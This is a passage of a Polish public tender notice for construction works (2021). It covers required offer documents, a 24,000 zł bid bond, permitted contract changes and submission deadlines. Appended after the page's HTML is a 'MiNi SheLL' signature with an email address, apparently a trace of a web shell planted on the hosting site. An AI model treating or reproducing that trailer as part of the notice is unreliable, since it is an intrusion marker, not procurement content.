zgodny z zamieszczonym wzorem - załącznik nr 7 do SWZ, skierowanych przez <br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za <br/>świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz <br/>z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia <br/>i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu <br/>wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi <br/>osobami.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Ofertę stanowi wypełniony Formularz Ofertowy – zgodnie z Załącznikiem nr 1 do SWZ. Wraz <br/>z ofertą Wykonawca jest zobowiązany złożyć: <br/>1) podpisane kosztorysy ofertowe sporządzone wg wzoru stanowiącego – załącznik nr 8 do SWZ <br/>2) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o <br/>Działalności Gospodarczej lub innego właściwego rejestru, chyba że Zamawiający może je <br/>uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych a Wykonawca w Formularzu <br/>Oferty wskazał dane umożliwiające dostęp do tych dokumentów w odniesieniu do Wykonawcy, <br/>Wykonawcy wspólnie ubiegającego się o zamówienie, jak również w odniesieniu do podmiotów <br/>udostępniających zasoby; w przypadku wskazania przez wykonawcę dostępności ww. <br/>dokumentów pod określonymi adresami internetowymi ogólnodostępnych i bezpłatnych baz <br/>danych, zamawiający może żądać od wykonawcy przetłumaczenia na język polski pobranych <br/>samodzielnie przez zamawiającego dokumentów;<br/>3) oświadczenia, wymagane postanowieniami o których mowa w Rozdziale VIII pkt. 1, w Rozdziale <br/>IX pkt. 9, w Rozdziale X pkt. 2 SWZ; <br/>4) zobowiązanie innego podmiotu, o którym mowa w Rozdziale XI pkt. 3 SWZ (jeżeli dotyczy), <br/>w przypadku jeżeli wykonawca polega na zdolnościach podmiotów udostepniających zasoby <br/>w celu potwierdzenia spełnienia warunków udziału w postępowaniu wraz z pełnomocnictwami, <br/>jeżeli prawo do podpisania danego zobowiązania nie wynika z dokumentów, o których mowa <br/>w pkt. 5 ppkt 1); <br/>5) oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia, o których mowa <br/>w art. 117 ust. 4 ustawy Pzp; wg załącznika nr 11 do SWZ<br/>6) dokumenty, z których wynika prawo do podpisania oferty; odpowiednie pełnomocnictwa (jeżeli <br/>dotyczy); <br/>7) dowód wniesienia wadium w przypadku wniesienia wadium w innej formie niż w pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany do wniesienia wadium w wysokości: 24 000,00 zł słownie: <br/>dwadzieścia cztery tysiące złotych 00/100 Wadium wnosi się przed upływem terminu składania ofert. Wadium może być wnoszone w jednej lub w kilku następujących formach, o których mowa w art. 97 <br/>ust. 7 ustawy Pzp: <br/>1) pieniądzu, <br/>2) gwarancjach bankowych; <br/>3) gwarancjach ubezpieczeniowych; <br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia <br/>9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019 r. poz.310, <br/>836 i 1572)<br/>Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego <br/>w Banku PEKAO S.A. numer: 92 1240 4748 1111 0000 4876 1705 w tytule wpisując numer <br/>postępowania z dopiskiem: wadium. Zaleca się dołączenie do oferty dokumentu potwierdzającego <br/>dokonanie przelewu. Wadium winno być na koncie Zamawiającego nie później niż przed upływem <br/>terminu składania ofert. Ze względu na ryzyko związane z czasem trwania okresu rozliczeń <br/>międzybankowych Zamawiający zaleca dokonanie przelewu ze stosownym wyprzedzeniem. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Zgodnie z SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> . Zmiana umowy może być dokonana w przypadku zmian nieistotnych w stosunku do treści oferty na podstawie <br/>której dokonano wyboru Wykonawcy oraz w przypadku zaistnienia okoliczności których nie można było <br/>przewidzieć w chwili zawarcia umowy a w szczególności:<br/>1) Termin realizacji przedmiotu zamówienia może ulec przesunięciu w przypadku wystąpienia opóźnień <br/>wynikających z:<br/>a) działania siły wyższej mającej bezpośredni wpływ na terminowość wykonywania robót tj. klęski <br/>żywiołowe (powodzie, huragany, długotrwałe intensywne opady deszczu itp.), epidemie.<br/>b) wykopalisk archeologicznych uniemożliwiających wykonywanie robót; <br/>c) wystąpienia innych okoliczności niezależnych od Wykonawcy takich jak: wypadki losowe, choroby, <br/>strajki generalne, lokalne;<br/>d) w razie wystąpienia robót dodatkowych wynikłych w trakcie realizacji zamówienia powodujących <br/>przesunięcie w czasie robót podstawowych;<br/>2) gdy zmianie uległy przepisy prawne istotne dla realizacji umowy;<br/>3) w przypadku urzędowej zmiany stawki podatku VAT;<br/>4) z uwagi na niezależne od stron okoliczności (nieprzewidziane zmiany organizacyjne, wypadki losowe, <br/>choroby) dotyczące osób kluczowych dla realizacji umowy. Zmiana Kierownika Budowy, w trakcie realizacji <br/>umowy, musi być uzasadniona przez Wykonawcę na piśmie i wymaga zaakceptowania przez Zamawiającego. <br/>Zamawiający zaakceptuje zmianę taką wyłącznie wtedy, gdy kwalifikacje i doświadczenie proponowanych <br/>osób będą nie gorsze niż wymagane postanowieniami Specyfikacji Warunków Zamówienia w razie wystąpienia konieczności zmiany podwykonawcy dla części zamówienia, którą Wykonawca wskazał <br/>w ofercie, że powierzy ją do wykonania podwykonawcy, za zgodą Zamawiającego i z zachowaniem zasad <br/>dotyczących podwykonawców określonych w umowie;<br/>6) w szczególnie uzasadnionym przypadku wystąpienia konieczności realizacji przez podwykonawcę części <br/>zamówienia, której Wykonawca nie wskazał w ofercie, że powierzy ją do wykonania podwykonawcy, <br/>za zgodą Zamawiającego i z zachowaniem wymogów dotyczących podwykonawców określonych w umowie.<br/>7) w sytuacji, gdy Wykonawca opierał się na zasobach podmiotów trzecich wykazując spełnianie warunków <br/>udziału w postępowaniu, dopuszcza się zmianę tych podmiotów na etapie realizacji zamówienia, pod <br/>warunkiem, że proponowany inny Podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie <br/>mniejszym niż podwykonawca na którego zasoby Wykonawca powoływał się w trakcie postępowania o <br/>udzielenie zamówienia publicznego;<br/>8) zmian teleadresowych Stron umowy określonych w umowie;<br/>9) oznaczenia danych dotyczących Zamawiającego i/lub Wykonawcy.<br/>2. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie <br/>której dokonano wyboru Wykonawcy, w przypadku wystąpienia okoliczności wymienionych w art. 455 ust. 1 pkt 2) <br/>– 4) oraz ust. 2 ustawy Prawo zamówień publicznych.<br/>3. Zmiany te mogą nastąpić za zgodą obu stron wyrażoną na piśmie w formie aneksu do umowy pod rygorem <br/>nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-05-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-05-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-06-25</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-07 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com